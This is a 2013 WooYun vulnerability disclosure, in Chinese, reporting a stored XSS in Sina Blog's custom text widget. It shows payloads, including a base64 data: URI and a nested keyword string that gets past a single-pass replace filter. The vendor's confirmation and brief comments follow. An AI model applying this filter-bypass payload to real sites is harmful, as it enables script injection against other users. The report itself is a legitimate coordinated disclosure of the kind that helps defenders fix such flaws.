当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033916

漏洞标题:新浪博客储存型XSS+过滤器猥琐绕过(黑盒XSS技巧)

相关厂商:新浪

漏洞作者: LaiX

提交时间:2013-08-09 08:35

修复时间:2013-09-23 08:35

公开时间:2013-09-23 08:35

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-09: 细节已通知厂商并且等待厂商处理中
2013-08-09: 厂商已经确认,细节仅向厂商公开
2013-08-19: 细节向核心白帽子及相关领域专家公开
2013-08-29: 细节向普通白帽子公开
2013-09-08: 细节向实习白帽子公开
2013-09-23: 细节向公众公开

简要描述:

新浪某储存型XSS有过滤器,猥琐的绕过...

详细说明:

新浪某储存型XSS有过滤器,猥琐的绕过...

漏洞证明:

打开新浪博客,点击 页面设置

.png


点击 自定义组件

<>


点击 添加文本组件

.png


点击 显示源代码

.png


插入

<a href="javascript:">test</a>


保存发现只要存在javascript整条a标签直接挂掉..
换个姿势插个属性

<img src=x onerror>


测试发现会直接删除 后台黑名单 内的属性,试了一下无法绕过。
接着用必杀技

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik7PC9zY3JpcHQ+">test</a>


测试发现 ; 号 前面的所有会被删除,被过滤成:

<a href=";base64,PHNjcmlwdD5hbGVydCgieHNzIik7PC9zY3JpcHQ+">test</a>


根据多年经验,我判断这一定是用replace过滤的,所以我构造如下姿势进行绕过。

<a href="datadata:text/html:data:text/htmltextdata:text/html/data:text/htmlhtml;base64,PHNjcmlwdD5hbGVydCgieHNzIik7PC9zY3JpcHQ+">test</a>


插入成功:

.png


点击一下,它弹起来了

over.png


修复方案:

请换一种思路过滤...

版权声明:转载请注明来源 LaiX@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:4

确认时间:2013-08-09 09:57

厂商回复:

感谢关注新浪安全,已安排人员进行修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-09 09:25 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    mark

  2. 2013-08-09 09:47 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    黑盒到底有多黑

  3. 2013-08-09 12:33 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    我来看看

  4. 2013-08-29 10:25 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    date?这样也可以弹额,学习了

  5. 2013-08-30 08:47 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    学习新姿势了。

  6. 2013-09-09 19:09 | o丨Reborn ( 路人 | Rank:4 漏洞数:2 | 白帽子)

    学习。。